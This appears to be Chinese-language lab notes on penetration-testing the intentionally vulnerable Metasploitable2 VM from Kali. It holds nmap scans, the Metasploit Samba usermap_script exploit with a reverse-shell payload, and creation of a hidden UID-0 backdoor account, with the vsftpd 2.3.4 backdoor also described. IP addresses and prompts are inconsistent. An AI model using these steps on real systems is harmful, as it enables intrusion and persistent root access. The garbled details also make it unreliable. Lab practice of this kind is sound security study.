-
Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击
- samba漏洞利用,获得shell
- 熟悉ssh工具的基本使用
- 搭建kali和Metasploitable2靶机环境
Kali:inet 192.168.6.129 netmask 255.255.255.0 broadcast 192.168.6.255
172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin
- 使用nmap扫码发现靶机,并使用msf6进行渗透测试
nmap -nsP 192.168.6.0/24
nmap -sV 192.168.11.128扫描该主机的全部端口,并查看对应端口的服务Service的版本 Version目标计算机是metasploitable2 445端口(Samba smbd 3.X - 4.X)可以作为目标利用
选择exploit路径: exploit/multi/samba/usermap_script 使用该exploit进行配置、渗透利用 msf5 > use exploit/multi/samba/usermap_script pmsf5 exploit(multi/samba/usermap_script) >
show payloads
选择 cmd/unix/reverse
msf6 payload(cmd/unix/reverse) > set rhost 172.17.152.196
rhost => 192.168.11.128
msf6 payload(cmd/unix/reverse) > set rport 445
rport => 445
msf6 payload(cmd/unix/reverse) > set lhost 192.168.6.129
lhost => 192.168.6.129
msf6 payload(cmd/unix/reverse) > show options
msf5 exploit(multi/samba/usermap_script) > exploit
成功
实现目标Linux进入
- 使用meterpreter进行靶机利用:
(1)基本访问
(2)创建账号/密码
(3)在Windows使用ssh工具实现对靶机的ssh连接
whoami,查看当前用户角色 直接创建root账户xyz puseradd -u 0 -o -g root -G root -d /home/xyz xyz p设置xyz的密码为123 ppasswd xyz 完成后,可以用vim /etc/passwd 查看,或者重新登录使用xyz账户
尝试连接xyz/123,成功
(4)其它利用
一.Mysql
账号root 密码为空
二、Metasploitable2漏洞列表21端口Vsftpd2.3.4
特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
扫描
通过nmap扫描查找到vsftpd2.3.4开启
攻击
使用msfconsole工具调出metasploit
使用search 查找模块
使用use设置模块
使用show options查看需配置的参数
使用set设置需配置的参数
使用exploit进行攻击攻击成功获取到靶机的权限